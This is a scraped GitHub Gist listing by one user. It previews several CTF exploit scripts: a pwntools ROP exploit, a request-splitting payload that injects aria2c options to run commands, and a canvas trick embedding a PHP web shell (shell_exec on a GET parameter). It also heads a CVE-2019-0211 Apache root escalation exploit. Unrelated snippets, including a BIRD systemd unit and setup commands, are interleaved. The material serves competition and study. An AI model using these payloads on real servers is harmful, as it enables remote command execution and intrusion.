Load. LoadLow
@LoadLow
LoadLow / carpediem.php
Last active April 15, 2019 09:48
Easier to test: close to 100% rate by flooding the page that sleeps at the end of the exploit (because it will spawn more workers) + graceful restart
<?php
# CARPE (DIEM): CVE-2019-0211 Apache Root Privilege Escalation
# Charles Fol
# @cfreal_
# 2019-04-08
#
# INFOS
#
# https://cfreal.github.io/carpe-diem-cve-2019-0211-apache-local-root.html
#
[Unit]
Description=BIRD routing daemon
#After=network-online.target
#Wants=network-online.target
After=network.target
[Service]
Type=forking
ExecStart=/usr/sbin/bird -c /etc/bird.conf -u bird -g bird
ExecReload=/usr/bin/birdc configure
@LoadLow
LoadLow / rop.py
Created October 28, 2018 06:50
SECCON 2018 - Classic elf64 ROP with ASLR + NX bit
from pwn import *
from struct import *
seip_offset = 72
def main():
    context(arch='amd64', os='linux')
    # ASLR + NX bit
    binary = ELF("samples/classic.elf64")
@LoadLow
LoadLow / pwn-not-random.py
Last active April 8, 2018 18:03
INS'HACK CTF 2018 - Prog Not random - PRNG Predictability - RushB%
import socket
import subprocess
import time
# https://github.com/eboda/mersenne-twister-recover
from MTRecover import MT19937Recover
class Netcat:
    def __init__(self, ip, port):
@LoadLow
LoadLow / pwn_curler.py
Last active April 8, 2018 18:04
INS'HACK CTF 2018 - Web Curler - HTTP request splitting to replace aria2c options, then use aria2c options to execute our sh commands - RushB%
import bson
CRLF = '\\u000D\\u000A'
def make_payload(url, inject_config):
inject_hostname = "localhost"
pld = url + " HTTP/1.1" + CRLF
pld += "Host: " + inject_hostname + CRLF
pld += "Accept-Encoding: identity" + CRLF
@LoadLow
LoadLow / Readme.md
Last active November 5, 2018 23:34
INS'HACK CTF 2018 - Web Crypt0r part 2 - Extend the hash - RushB%
  1. Guessed integrity check: user : hash : b64_encoded_info in the `user` cookie

  2. info in YAML format

  3. Some YAML parsers allow redefining the same key, which replaces the old value

  4. We have a hint: /src-code/ contains a swp file; the original file was removed. It's easy to extract the web app's source code from it. Of course, it's a double-key permissive YAML parser

@LoadLow
LoadLow / recover_key.py
Last active April 8, 2018 18:05
NDH quals CTF 2018 - Rev SoStealthy - RushB%
import base64
pld = "AAEAAAD/////AQAAAAAAAAAEAQAAACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVy" + \
@LoadLow
LoadLow / mk_payload.js
Last active April 8, 2018 18:05
NDH quals CTF 2018 - Web PixEditor - RushB%
var phpcode = "die(shell_exec($_GET['b']));";
var pld = " <?php \r\n"+phpcode+"\r\n//";
var canvas = document.createElement("canvas");
var ctx = canvas.getContext('2d');
var pos = 0, r, g, b;
for(var i=0; i<32; ++i) {
    for(var j=0; j<32; ++j) {
@LoadLow
LoadLow / ngx_http_modsecurity.c
Last active May 10, 2017 02:58
Fix 500 Internal errors on POST requests with Nginx + modsecurity + OWASP rules
/*
* ModSecurity for Apache 2.x, http://www.modsecurity.org/
* Copyright (c) 2004-2013 Trustwave Holdings, Inc. (http://www.trustwave.com/)
*
* You may not use this file except in compliance with
* the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* If any of the files related to licensing are missing or if you have any
@LoadLow
LoadLow / setup.bash
Last active May 3, 2016 09:01
Set up & fix rubypython on Ubuntu/Debian
sudo apt-get install ruby ruby-dev python2.7 python2.7-dev
sudo gem install ffi
sudo gem install rubypython
cd /usr/lib
# For ubuntu 14.04(AMD64/x86_64)
sudo ln -s /usr/lib/python2.7/config-x86_64-linux-gnu/libpython2.7.so
sudo ln -s /usr/lib/x86_64-linux-gnu/libpython2.7.so.1.0
# For ubuntu 14.04(x86)
sudo ln -s /usr/lib/python2.7/config-i386-linux-gnu/libpython2.7.so